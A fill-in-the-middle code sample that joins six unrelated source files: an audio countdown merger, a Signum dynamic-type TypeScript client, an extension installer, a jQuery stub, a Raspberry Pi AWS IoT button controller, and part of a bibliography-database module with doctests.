<|file_name|>AudioMerger.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from pydub import *

class AudioMerger:
    voice_tags = ["one", "two", "three", "four", "five", "ten", "RUN", "relax", "completed"]

    def __init__(self, music):
        self.music = music
        self.additionalGain = 8
        self.voices={}
        for voice in self.voice_tags:
            sound = AudioSegment.from_file('voices/' + voice + '.wav')
            sound += self.additionalGain
            self.voices[voice] = sound

    def addCountdown(self, startTime, isRun = True):
        for i in range(1, 6):
            voice = self.voices[self.voice_tags[i - 1]]
            self.music = self.music.overlay(voice, position = (startTime - i) * 1000)
        self.music = self.music.overlay(self.voices["ten"], position = (startTime - 10) * 1000)
        voice = self.voices["RUN" if isRun else "relax"]
        self.music = self.music.overlay(voice, position = startTime * 1000)

    def addCompleted(self, startTimeSec):
        self.music = self.music.overlay(self.voices["completed"], position = (startTimeSec * 1000))

    def exportMusic(self, fname):
        self.music.export(fname + ".mp3", format="mp3")<|fim▁end|>
<|file_name|>DynamicTypeClient.tsx<|end_file_name|><|fim▁begin|>import * as React from 'react' import { ifError } from '@framework/Globals'; import { ajaxPost, ajaxGet, ValidationError } from '@framework/Services'; import { SearchControl, ValueSearchControlLine } from '@framework/Search' import * as Finder from '@framework/Finder' import { EntitySettings } from '@framework/Navigator' import * as AppContext from '@framework/AppContext' import * as Navigator from '@framework/Navigator' import MessageModal from '@framework/Modals/MessageModal' import { EntityData, EntityKind, symbolNiceName } from '@framework/Reflection' import { EntityOperationSettings } from '@framework/Operations' import * as Operations from '@framework/Operations' import { NormalControlMessage } from '@framework/Signum.Entities' import * as QuickLink from '@framework/QuickLinks' import { DynamicTypeEntity, DynamicMixinConnectionEntity, DynamicTypeOperation, DynamicSqlMigrationEntity, DynamicRenameEntity, DynamicTypeMessage, DynamicPanelPermission, DynamicApiEntity } from './Signum.Entities.Dynamic' import DynamicTypeComponent from './Type/DynamicType' //typings only import * as DynamicClientOptions from './DynamicClientOptions' import * as AuthClient from '../Authorization/AuthClient' import { Tab } from 'react-bootstrap'; export function start(options: { routes: JSX.Element[] }) { Navigator.addSettings(new EntitySettings(DynamicTypeEntity, w => import('./Type/DynamicType'))); Navigator.addSettings(new EntitySettings(DynamicMixinConnectionEntity, w => import('./Type/DynamicMixinConnection'))); Navigator.addSettings(new EntitySettings(DynamicSqlMigrationEntity, w => import('./Type/DynamicSqlMigration'))); Operations.addSettings(new EntityOperationSettings(DynamicTypeOperation.Clone, { contextual: { icon: "clone", iconColor: "black" }, })); Operations.addSettings(new EntityOperationSettings(DynamicTypeOperation.Save, { onClick: eoc => { (eoc.frame.entityComponent as DynamicTypeComponent).beforeSave(); Operations.API.executeEntity(eoc.entity, eoc.operationInfo.key) .then(pack => { eoc.frame.onReload(pack); Operations.notifySuccess(); }) .then(() => { if (AuthClient.isPermissionAuthorized(DynamicPanelPermission.ViewDynamicPanel)) { MessageModal.show({ title: DynamicTypeMessage.TypeSaved.niceToString(), message: DynamicTypeMessage.DynamicType0SucessfullySavedGoToDynamicPanelNow.niceToString(eoc.entity.typeName), buttons: "yes_no", style: "success", icon: "success" }).then(result => { if (result == "yes") window.open(AppContext.toAbsoluteUrl("~/dynamic/panel")); }).done(); } }) .catch(ifError(ValidationError, e => eoc.frame.setError(e.modelState, "entity"))) .done(); }, alternatives: eoc => [], })); QuickLink.registerQuickLink(DynamicTypeEntity, ctx => new QuickLink.QuickLinkLink("ViewDynamicPanel", () => symbolNiceName(DynamicPanelPermission.ViewDynamicPanel), "~/dynamic/panel", { isVisible: AuthClient.isPermissionAuthorized(DynamicPanelPermission.ViewDynamicPanel), icon: "arrows-alt", iconColor: "purple", })); DynamicClientOptions.Options.onGetDynamicLineForPanel.push(ctx => <ValueSearchControlLine ctx={ctx} findOptions={{ queryName: DynamicTypeEntity }} />); DynamicClientOptions.Options.onGetDynamicLineForPanel.push(ctx => <ValueSearchControlLine ctx={ctx} findOptions={{ queryName: DynamicMixinConnectionEntity }} />); DynamicClientOptions.Options.getDynaicMigrationsStep = () => <> <h3>{DynamicSqlMigrationEntity.nicePluralName()}</h3> <SearchControl findOptions={{ queryName: DynamicSqlMigrationEntity }} /> 
<h3>{DynamicRenameEntity.nicePluralName()}</h3> <SearchControl findOptions={{ queryName: DynamicRenameEntity }} /> </>; DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicTypeEntity, t => [ { token: t.append(p => p.typeName), type: "Text" }, { token: t.append(p => p.entity.typeDefinition), type: "JSon" }, ]); DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicMixinConnectionEntity, t => [ { token: t.append(p => p.mixinName), type: "Text" }, { token: t.append(p => p.entity.entityType.entity!.cleanName), type: "Text" }, ]); DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicSqlMigrationEntity, t => [ { token: t.append(p => p.comment), type: "Text" }, { token: t.append(p => p.entity.script), type: "Code" }, ]); DynamicClientOptions.Options.registerDynamicPanelSearch(DynamicRenameEntity, t => [ { token: t.append(p => p.oldName), type: "Text" }, { token: t.append(p => p.newName), type: "Text" }, { token: t.append(p => p.replacementKey), type: "Text" }, ]); } export namespace API { export function getPropertyType(property: DynamicProperty): Promise<string> { return ajaxPost({ url: `~/api/dynamic/type/propertyType` }, property); } export function expressionNames(typeName: string): Promise<Array<string>> { return ajaxGet({ url: `~/api/dynamic/type/expressionNames/${typeName}` }); } } export interface DynamicTypeDefinition { primaryKey?: DynamicTypePrimaryKeyDefinition; ticks?: DynamicTypeTicksDefinition; tableName?: string; entityKind?: EntityKind; entityData?: EntityData; operationCreate?: OperationConstruct; operationSave?: OperationExecute; operationDelete?: OperationDelete; operationClone?: OperationConstructFrom; customInheritance?: DynamicTypeCustomCode; customEntityMembers?: DynamicTypeCustomCode; customStartCode?: DynamicTypeCustomCode; customLogicMembers?: DynamicTypeCustomCode; customTypes?: DynamicTypeCustomCode; customBeforeSchema?: DynamicTypeCustomCode; queryFields: string[]; multiColumnUniqueIndex?: MultiColumnUniqueIndex; properties: DynamicProperty[]; toStringExpression?: string; } export interface DynamicProperty { uid: string; name: string; columnName?: string; type: string; columnType?: string; isNullable: string; uniqueIndex: string; isLite?: boolean; isMList?: DynamicTypeBackMListDefinition; size?: number; scale?: number; unit?: string; format?: string; notifyChanges?: boolean; _propertyType_?: string; validators?: Validators.DynamicValidator[]; customFieldAttributes?: string; customPropertyAttributes?: string; } export interface DynamicTypePrimaryKeyDefinition { name?: string; type?: string; identity: boolean; } export interface DynamicTypeTicksDefinition { hasTicks: boolean; name?: string; type?: string; } export interface DynamicTypeBackMListDefinition { tableName?: string; preserveOrder: boolean; orderName?: string; backReferenceName?: string; } export interface MultiColumnUniqueIndex { fields: string[]; where?: string; } export interface OperationConstruct { construct: string; } export interface OperationExecute { canExecute?: string; execute: string; } export interface OperationConstructFrom { canConstruct?: string; construct: string; } export interface OperationDelete { canDelete?: string; delete: string; } export interface DynamicTypeCustomCode { code?: string; } export namespace Validators { export interface DynamicValidator { type: string; } export interface NotNull extends DynamicValidator { type: 'NotNull'; disabled?: number; } export interface StringLength extends DynamicValidator { <|fim▁hole|> max?: number; 
allowLeadingSpaces?: boolean; allowTrailingSpaces?: boolean; } export interface Decimals extends DynamicValidator { type: 'Decimals'; decimalPlaces: number; } export interface NumberIs extends DynamicValidator { type: 'NumberIs'; comparisonType: string; number: number; } export interface CountIs extends DynamicValidator { type: 'CountIs'; comparisonType: string; number: number; } export const ComparisonTypeValues = ["EqualTo", "DistinctTo", "GreaterThan", "GreaterThanOrEqualTo", "LessThan", "LessThanOrEqualTo"]; export interface NumberBetween extends DynamicValidator { type: 'NumberBetween'; min: number; max: number; } export interface DateTimePrecision extends DynamicValidator { type: 'DateTimePrecision'; precision: string; } export interface TimeSpanPrecision extends DynamicValidator { type: 'TimeSpanPrecision'; precision: string; } export const DateTimePrecisionTypeValues = ["Days", "Hours", "Minutes", "Seconds", "Milliseconds"]; export interface StringCase extends DynamicValidator { type: 'StringCase'; textCase: string; } export const StringCaseTypeValues = ["UpperCase", "LowerCase"]; } export const IsNullableValues = ["Yes", "OnlyInMemory", "No"]; export const UniqueIndexValues = ["No", "Yes", "YesAllowNull"];<|fim▁end|>
        type: 'StringLength';
        multiLine: boolean;
        min?: number;
<|file_name|>install_extension.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python """This utility installs an engage extension into a deployment home. """ import os import os.path import sys from optparse import OptionParser import shutil import re import logging logger = logging.getLogger(__name__) # enable importing from the python_pkg sub-directory base_src_dir=os.path.abspath(os.path.dirname(__file__)) python_pkg_dir = os.path.join(base_src_dir, "python_pkg") assert os.path.exists(python_pkg_dir), "Python package directory %s does not exist" % python_pkg_dir sys.path.append(python_pkg_dir) from engage.extensions import installed_extensions, extension_versions dist_root = os.path.abspath(os.path.dirname(__file__)) dist_root_parent = os.path.abspath(os.path.join(dist_root, "..")) class EngageExtension(object): def __init__(self, path, name, version, update): self.path = path self.name = name self.version = version self.update = update def _copy_dir(self, src_dirname, target, dry_run=False): src_dir = os.path.join(self.path, src_dirname) dest_dir = os.path.join(os.path.join(target, src_dirname), self.name) if os.path.exists(src_dir): logger.info("Copying %s to %s" % (src_dirname, dest_dir)) if os.path.exists(dest_dir): if self.update: logger.warn("removing old version of %s" % dest_dir) if not dry_run: shutil.rmtree(dest_dir) else: raise Exception("Target directory %s already exists" % dest_dir) if not dry_run: shutil.copytree(src_dir, dest_dir) elif self.update and os.path.exists(dest_dir): logger.warn("removing old version of %s" % dest_dir) if not dry_run: shutil.rmtree(dest_dir) def install(self, dist_root, dry_run=False): if not dry_run: logger.info("Running install of %s to %s" % (self.name, dist_root))<|fim▁hole|> logger.info("Dry run install of %s to %s" % (self.name, dist_root)) self._copy_dir("metadata", dist_root, dry_run=dry_run) dest_engage_pkg_dir = os.path.join(os.path.join(dist_root, "python_pkg"), "engage") self._copy_dir("drivers", dest_engage_pkg_dir, dry_run=dry_run) self._copy_dir("tests", dest_engage_pkg_dir, dry_run=dry_run) self._copy_dir("mgt_backends", dest_engage_pkg_dir, dry_run=dry_run) # For the software packages we copy the individual files to the main package # cache. 
src_cache_dir = os.path.join(self.path, "sw_packages") dest_cache_dir = os.path.join(dist_root, "sw_packages") if os.path.exists(src_cache_dir): logger.info("Copying software packages from %s to %s" % (src_cache_dir, dest_cache_dir)) for fname in os.listdir(src_cache_dir): src_file = os.path.join(src_cache_dir, fname) dest_file = os.path.join(dest_cache_dir, fname) logger.debug("Copying %s to %s" % (fname, dest_file)) shutil.copyfile(src_file, dest_file) # update the extension file if self.name not in installed_extensions: installed_extensions.append(self.name) extension_versions[self.name] = self.version extns_file = os.path.join(dest_engage_pkg_dir, "extensions.py") logger.info("Updating extensions file %s" % extns_file) with open(extns_file, "rb") as ef: lines = ef.read().split("\n") updated_list = False updated_versions = False if not dry_run: with open(extns_file, "wb") as ef: for line in lines: if re.match("^installed_extensions = ", line): ef.write("installed_extensions = %s\n" % installed_extensions.__repr__()) updated_list = True elif re.match("^extension_versions = ", line): ef.write("extension_versions = %s\n" % extension_versions.__repr__()) updated_versions = True else: ef.write(line + "\n") else: for line in lines: if re.match("^installed_extensions = ", line): sys.stdout.write("installed_extensions = %s\n" % installed_extensions.__repr__()) updated_list = True elif re.match("^extension_versions = ", line): sys.stdout.write("extension_versions = %s\n" % extension_versions.__repr__()) updated_versions = True else: sys.stdout.write(line + "\n") if ((not updated_list) or (not updated_versions)): raise Exception("Extension registration file %s did not have correct format, unable to complete update" % extns_file) logger.info("Successfully installed extension %s" % self.name) def process_args(argv): usage = "usage: %prog [options] path_to_extension" parser = OptionParser(usage=usage) parser.add_option("--dry-run", action="store_true", help="If specified, don't make changes, just log what would be done", default=False) parser.add_option("--update", "-u", action="store_true", help="If specified, override any existing version of the extension", default=False) (options, args) = parser.parse_args(args=argv) if len(args)==0: parser.print_help() sys.exit(0) elif len(args) > 1: parser.error("Expecting exactly one argument, path to extension directory") extension_path = os.path.abspath(args[0]) if not os.path.exists(extension_path): parser.error("Extension directory %s does not exist" % extension_path) extension_name = os.path.basename(extension_path) if os.path.basename(dist_root_parent)=="src": parser.error("Cannot install extension into source tree %s, run from distribution tree" % dist_root) if extension_name in installed_extensions and not options.update: parser.error("Extension %s already installed" % extension_name) version_file = os.path.join(extension_path, "version.txt") if not os.path.exists(version_file): parser.error("Missing version file %s" % version_file) with open(version_file, "rb") as vf: extension_version = vf.read().rstrip() ext = EngageExtension(extension_path, extension_name, extension_version, options.update) return (ext, options) def main(argv=sys.argv[1:]): (ext, opts) = process_args(argv) ext.install(dist_root, dry_run=opts.dry_run) return 0 if __name__ == "__main__": #formatter = logging.Formatter("[%(levelname)s][%(name)s] %(message)s") root_logger = logging.getLogger() root_logger.setLevel(logging.INFO) console_handler = logging.StreamHandler(sys.stdout) 
    console_handler.setLevel(logging.INFO)
    #console_handler.setFormatter(formatter)
    root_logger.addHandler(console_handler)
    logger.setLevel(logging.INFO)
    sys.exit(main())<|fim▁end|>
else:
<|file_name|>closure.js<|end_file_name|><|fim▁begin|>// Looking at closures // http://stackoverflow.com/q/111102/137001 $(document).ready(function() {<|fim▁hole|> closureTest(); function closureTest() { //console.log } });<|fim▁end|>
<|file_name|>controlUnit.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import argparse import json import time import logging from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTShadowClient import RPi.GPIO as GPIO <|fim▁hole|>parser.add_argument('-c', '--cert', required=True, help='Certificate file path.') parser.add_argument('-k', '--key', required=True, help='Private key file path.') args = parser.parse_args() def lightbulbShadowCallback_Update(payload, responseStatus, token): if responseStatus == "timeout": print("Update request " + token + " time out!") if responseStatus == "accepted": payloadDict = json.loads(payload) print("~~~~~~~~~~~~~~~~~~~~~~~") print("Update request with token: " + token + " accepted!") print("property: " + str(payloadDict["state"]["desired"]["color"])) print("~~~~~~~~~~~~~~~~~~~~~~~\n\n") if responseStatus == "rejected": print("Update request " + token + " rejected!") def lightBulbShadowCallback_Delete(payload, responseStatus, token): if responseStatus == "timeout": print("Delete request " + token + " time out!") if responseStatus == "accepted": print("~~~~~~~~~~~~~~~~~~~~~~~") print("Delete request with token: " + token + " accepted!") print("~~~~~~~~~~~~~~~~~~~~~~~\n\n") if responseStatus == "rejected": print("Delete request " + token + " rejected!") # Configure logging logger = logging.getLogger("AWSIoTPythonSDK.core") logger.setLevel(logging.DEBUG) streamHandler = logging.StreamHandler() formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') streamHandler.setFormatter(formatter) logger.addHandler(streamHandler) # Init AWSIoTMQTTShadowClient lightBulbShadowClient = AWSIoTMQTTShadowClient("controlUnitClient") lightBulbShadowClient.configureEndpoint(args.endpoint, 8883) lightBulbShadowClient.configureCredentials(args.rootCA, args.key, args.cert) # AWSIoTMQTTShadowClient configuration lightBulbShadowClient.configureAutoReconnectBackoffTime(1, 32, 20) lightBulbShadowClient.configureConnectDisconnectTimeout(10) # 10 sec lightBulbShadowClient.configureMQTTOperationTimeout(5) # 5 sec # Connect to AWS IoT lightBulbShadowClient.connect() # Create a deviceShadow with persistent subscription ControlUnit = lightBulbShadowClient.createShadowHandlerWithName("rpi-sense-hat", True) # Delete shadow JSON doc ControlUnit.shadowDelete(lightBulbShadowCallback_Delete, 5) # Update shadow def updateShadow(color): JSONPayload = '{"state":{"desired":{"color":"' + color + '"}}}' ControlUnit.shadowUpdate(JSONPayload, lightbulbShadowCallback_Update, 5) RED = 9 GREEN = 10 BLUE = 11 GPIO.setmode(GPIO.BCM) GPIO.setup(RED, GPIO.IN) GPIO.setup(GREEN, GPIO.IN) GPIO.setup(BLUE, GPIO.IN) lastButton = None while True: if (lastButton != RED and GPIO.input(RED) == False): lastButton = RED updateShadow("red") if (lastButton != GREEN and GPIO.input(GREEN) == False): lastButton = GREEN updateShadow("green") if (lastButton != BLUE and GPIO.input(BLUE)== False): lastButton = BLUE updateShadow("blue") time.sleep(0.05);<|fim▁end|>
parser = argparse.ArgumentParser(description='Lightbulb control unit.') parser.add_argument('-e', '--endpoint', required=True, help='The AWS Iot endpoint.') parser.add_argument('-r', '--rootCA', required=True, help='Root CA file path.')
<|file_name|>operations.py<|end_file_name|><|fim▁begin|>"""This module contains functions to :meth:`~reload` the database, load work and citations from there, and operate BibTeX""" import importlib import re import textwrap import warnings import subprocess from copy import copy from collections import OrderedDict from bibtexparser.bwriter import BibTexWriter from bibtexparser.bibdatabase import BibDatabase from .collection_helpers import oget, oset, dget, dset, dhas from .collection_helpers import consume, setitem, callable_get from .models import DB, Year from .dbindex import parse_varname, year_file from .utils import import_submodules from .utils import parse_bibtex from .rules import ConvertDict, ConvertWork, old_form_to_new from . import config WORK_CACHE = {} CITATION_CACHE = {} GROUP_CACHE = {} def load_work(): """Load a list of all work in the database""" return list(DB.work()) def load_citations(): """Load a list of all citations""" return list(DB.citations()) def load_places_vars(): """Load all places from the database It generates tuples with variable name and Place object Doctest: .. doctest:: >>> 'arXiv' in [varname for varname, _ in load_places_vars()] True """ places = config.MODULES["places"] for varname, varvalue in places.__dict__.items(): if isinstance(varvalue, places.Place): yield varname, varvalue def load_work_map(year): """Load all work from a given year file It generates tuples with variable name and Work object Doctest: .. doctest:: >>> reload() >>> sorted([(work.year, key) for key, work in load_work_map(2015)]) [(2014, 'murta2014a'), (2015, 'pimentel2015a')] (2014, 'murta2014a') appears because it has an alias in 2015 """ module = "y{}.py".format(year) if isinstance(year, int) else year if module not in WORK_CACHE: module = "y9999.py" worklist = WORK_CACHE[module] for key, work in worklist.__dict__.items(): if isinstance(work, worklist.Work): oset(work, "metakey", key) yield key, work def work_by_varname(varname, year=None): """Load work by varname Doctest: .. doctest:: >>> reload() >>> work = work_by_varname('murta2014a') >>> work.year 2014 """ if year is None: year = int(parse_varname(varname, 2) or -1) module = "y{}.py".format(year) if isinstance(year, int) else year if module not in WORK_CACHE: return worklist = WORK_CACHE[module] return getattr(worklist, varname, None) def load_work_map_all_years(): """Load all work from all years Doctest: .. doctest:: >>> reload() >>> sorted([(work.year, key) for key, work in load_work_map_all_years()]) [(2008, 'freire2008a'), (2014, 'murta2014a'), (2014, 'murta2014a'), (2015, 'pimentel2015a')] (2014, 'murta2014a') appears twice because it has an alias in 2015 """ years = reversed(sorted(WORK_CACHE.keys())) for year in years: yield from load_work_map(year) def _clear_db(): """Erase database""" from .approaches import APPROACHES APPROACHES.clear() importlib.invalidate_caches() DB.clear_places() DB.clear_work() DB.clear_citations() def _reload_work(): """Reload work and create WORD_CACHE""" for key, module in import_submodules(config.MODULES["work"]).items(): yname = key.split(".")[-1] fname = (yname + ".py") WORK_CACHE[fname] = module if not yname.startswith("y") or not yname[1:].isdigit(): warnings.warn( "Invalid name for file {}. 
Year discovery may fail".format(key) ) def reload(work_func=None): """Reload all the database Doctest: ..doctest:: >>> reload() >>> from snowballing.example.database.work.y2014 import murta2014a >>> murta2014a.metakey 'murta2014a' >>> from snowballing.example.database.work.y2015 import murta2014a as alias >>> alias is murta2014a True """ _clear_db() if config.MODULES["places"]: importlib.reload(config.MODULES["places"]) _reload_work() import_submodules(config.MODULES["citations"]) import_submodules(config.MODULES["groups"]) if getattr(config, "CHECK_DEPRECATION", True): check_config_deprecation() for key, work in load_work_map_all_years(): oset(work, "metakey", key) if work_func: work_func(work, key) for alias in config.get_work_aliases(work): year = config.get_alias_year(work, alias) module = "y{}.py".format(year) if isinstance(year, int) else year if module not in WORK_CACHE: module = "y9999.py" setattr(WORK_CACHE[module], key, work) def bibtex_to_info(citation, rules=None): """Convert BibTeX dict from bibtexparse to info dict for adding a db entry Doctest: .. doctest:: >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'year': '2017'}) {'place1': '', 'year': 2017, 'name': 'a', 'authors': 'Pim, J', 'display': 'pim', 'pyref': 'pim2017a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'year': '2017 [in press]'}) {'place1': '', 'year': 2017, 'name': 'a', 'authors': 'Pim, J', 'note': 'in press', 'display': 'pim', 'pyref': 'pim2017a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'pages': '1--5'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'pp': '1--5', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'journal': 'CiSE'}) {'place1': 'CiSE', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'place': 'CiSE', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'ENTRYTYPE': 'article'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'entrytype': 'article', 'display': 'pim', 'pyref': 'pim0a'} >>> bibtex_to_info({'title': 'a', 'author': 'Pim, J', 'other': 'a'}) {'place1': '', 'year': 0, 'name': 'a', 'authors': 'Pim, J', 'display': 'pim', 'pyref': 'pim0a', 'other': 'a'} """ rules = rules or config.BIBTEX_TO_INFO return ConvertDict(rules).run(citation) def extract_info(article, rules=None): """Extract info from google scholar article Doctest: .. doctest:: Mock: >>> class Article: pass >>> article = Article() >>> article.as_citation = lambda: ''' ... @inproceedings{murta2014noworkflow, ... title={noWorkflow: capturing and analyzing provenance of scripts}, ... author={Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana}, ... booktitle={International Provenance and Annotation Workshop}, ... pages={71--83}, ... year={2014}, ... organization={Springer} ... }''' >>> article.attrs = { ... 'excerpt': ['Abstract'], ... 'cluster_id': ['5458343950729529273'], ... 'url_citations': ['http://scholar.google.com/scholar?cites=5458343950729529273&as_sdt=2005&sciodt=0,5&hl=en'], ... 
} >>> article.div = None Test: >>> reload() # Deterministic name >>> extract_info(article) {'place1': 'International Provenance and Annotation Workshop', 'year': 2014, 'pp': '71--83', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing and analyzing provenance of scripts', 'entrytype': 'inproceedings', 'place': 'IPAW', 'display': 'murta', 'pyref': 'murta2014b', 'organization': 'Springer', 'ID': 'murta2014noworkflow', 'excerpt': 'Abstract', 'cluster_id': '5458343950729529273', 'scholar': 'http://scholar.google.com/scholar?cites=5458343950729529273&as_sdt=2005&sciodt=0,5&hl=en'} """ rules = rules or config.BIBTEX_TO_INFO as_citation = article.as_citation() if not isinstance(as_citation, str): as_citation = as_citation.decode("utf-8") citation = parse_bibtex(as_citation)[0] converter = ConvertDict(rules) return converter.run(citation, article=article) def info_to_code(article, rules=None): """Convert info dict into code Required attributes: * pyref * display * year * name * place || place1 Doctest: .. doctest:: >>> print(info_to_code({ ... 'pyref': 'pimentel2017a', ... 'display': 'disp', ... 'year': 2017, ... 'name': 'snowballing', ... 'authors': 'Pimentel, Joao', ... 'place1': 'CACM' ... })) <BLANKLINE> pimentel2017a = DB(Work( 2017, "snowballing", display="disp", authors="Pimentel, Joao", place1="CACM", )) With place: >>> print(info_to_code({ ... 'pyref': 'murta2014a', ... 'display': 'noworkflow', ... 'year': 2014, ... 'name': 'noWorkflow: capturing and analyzing provenance of scripts', ... 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', ... 'place': config.MODULES['places'].IPAW, ... })) <BLANKLINE> murta2014a = DB(Work( 2014, "noWorkflow: capturing and analyzing provenance of scripts", display="noworkflow", authors="Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana", place=IPAW, )) With string place: >>> print(info_to_code({ ... 'pyref': 'murta2014a', ... 'display': 'noworkflow', ... 'year': 2014, ... 'name': 'noWorkflow: capturing and analyzing provenance of scripts', ... 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', ... 'place': 'IPAW', ... })) <BLANKLINE> murta2014a = DB(Work( 2014, "noWorkflow: capturing and analyzing provenance of scripts", display="noworkflow", authors="Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana", place=IPAW, )) With _work_type, due, excerpt, others: >>> print(info_to_code({ ... '_work_type': 'WorkSnowball', ... 'due': 'Unrelated to my snowballing', ... 'excerpt': 'Ignore excerpt', ... 'other': 'Do not ignore other fields', ... 'pyref': 'murta2014a', ... 'display': 'noworkflow', ... 'year': 2014, ... 'name': 'noWorkflow: capturing and analyzing provenance of scripts', ... 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', ... 'place': config.MODULES['places'].IPAW, ... 
})) <BLANKLINE> murta2014a = DB(WorkSnowball( 2014, "noWorkflow: capturing and analyzing provenance of scripts", due="Unrelated to my snowballing", display="noworkflow", authors="Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana", place=IPAW, other='Do not ignore other fields', )) """ rules = rules or config.INFO_TO_INSERT info = copy(article) converter = ConvertDict(rules) return converter.run(info) def set_by_info(work, info, set_scholar=True, rules=None): """Find attributes that should be modified in a work object to make it match an info object""" rules = rules or config.BIBTEX_TO_INFO rules.get("<set_before>", lambda x, y: None)(work, info) work_keys = {k for k in work.__dict__.keys() if not k.startswith("__")} - rules["<set_ignore_keys>"] meta_keys = info.keys() - rules.get("<set_ignore_keys>", set()) show_result = OrderedDict( (key, None) for key in rules.get("<set_order>", []) ) set_result = {} shared = meta_keys & work_keys for key in shared: value = info[key] add = False if key in rules.get("<set_ignore_but_show>", set()): add = True elif getattr(work, key) != value and key not in getattr(work, rules.get("<set_ignore_attr>", "ignoreattrs"), set()): add = True set_result[key] = (value, getattr(work, key)) elif key in rules.get("<set_always_show>", set()): add = True if add: show_result[key] = (value, getattr(work, key)) for key in meta_keys - work_keys: value = info[key] set_result[key] = (value, None) show_result[key] = (value, "") if set_scholar and rules.get("<scholar_ok>") and not hasattr(work, rules["<scholar_ok>"]): set_result[rules["<scholar_ok>"]] = (True, None) result = { "show": show_result, "set": set_result, } if "<pos_diff>" in rules: rules["<pos_diff>"](work, info, result) return result def changes_dict_to_set_attribute(metakey, changes_dict, end=";"): """Convert dictionart of changes to set_attribute instructions""" result = [] for key, (value, old) in changes_dict.items(): result.append("set_attribute({!r}, {!r}, {!r}, old={!r})".format(metakey, key, value, old)) return "\n".join(result) + end def citation_text(workref, cited, ref="", backward=False): """Create code for citation Arguments: * `workref` -- work varname that is cited (by default) * `cited` -- work info dict that cites the work (by default) Keyword arguments: * `ref` -- citation number * `backward` -- invert citation: `workref` cites `cited` Doctest: .. doctest:: >>> print(citation_text('freire2008a', {'pyref': 'murta2014a'})) <BLANKLINE> DB(Citation( murta2014a, freire2008a, ref="", contexts=[ <BLANKLINE> ], )) <BLANKLINE> >>> print(citation_text('pimentel2015a', {'pyref': 'murta2014a'}, backward=True, ref="[8]")) <BLANKLINE> DB(Citation( pimentel2015a, murta2014a, ref="[8]", contexts=[ <BLANKLINE> ], )) <BLANKLINE> """ pyref = dget(cited, "pyref") thepyref = pyref if backward: pyref, workref = workref, pyref return textwrap.dedent(""" DB(Citation( {pyref}, {workref}, ref="{ref}", contexts=[ ], )) """.format(**locals())) def compare_paper_to_work(letter, key, work, paper): """Compares paper info to work Arguments: * `letter` -- indicates last letter * `key` -- indicates the key ID in BibTeX * `work` -- work object * `paper` -- paper info dict Returns: work, letter * If it doesn't match, work is None Doctest: .. 
doctest:: >>> reload() >>> work = work_by_varname('murta2014a') Fail: >>> paper = {'pyref': 'pimentel2017a', 'authors': 'Pimentel, Joao', 'name': 'Other', 'year': 2017} >>> compare_paper_to_work(ord("a") - 1, 'pimentel2017a', work, paper) (None, 98) >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) (None, 96) Cluster ID: >>> paper['cluster_id'] = '5458343950729529273' >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True Alias: >>> paper = {'pyref': 'chirigati2015a', 'authors': 'Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: Capturing and Analyzing Provenance of Scripts', 'year': 2015} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True Name: >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing and analyzing provenance of scripts', 'year': 2014} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True Similar Name fail: >>> paper = {'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing provenance of scripts', 'year': 2014} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) (None, 96) Similar Name works due to same place: >>> paper = {'pyref': 'murta2014a', 'authors': 'Murta, Leonardo and Braganholo, Vanessa and Chirigati, Fernando and Koop, David and Freire, Juliana', 'name': 'noWorkflow: capturing provenance of scripts', 'year': 2014, 'place': 'IPAW'} >>> compare_paper_to_work(ord("a") - 1, 'other2017a', work, paper) == (work, 96) True """ if work is None: return None, letter if key.startswith(dget(paper, "pyref", "<invalid>")[:-1]): lastletter = key[-1] if key[-1].isalpha() else "a" letter = max(ord(lastletter) + 1, letter) if config.info_work_match(paper, work): dset(paper, "pyref", key) return work, letter return None, letter def find_work_by_info(paper, pyrefs=None, rules=None): """Find work by paper info dict Limits search for specific year (or all years, if year is 0) Generates 'place' based on 'entrytype' Converts 'school' -> 'local' Tries to get varname from 'ID' in case the bibtex were generated from our db 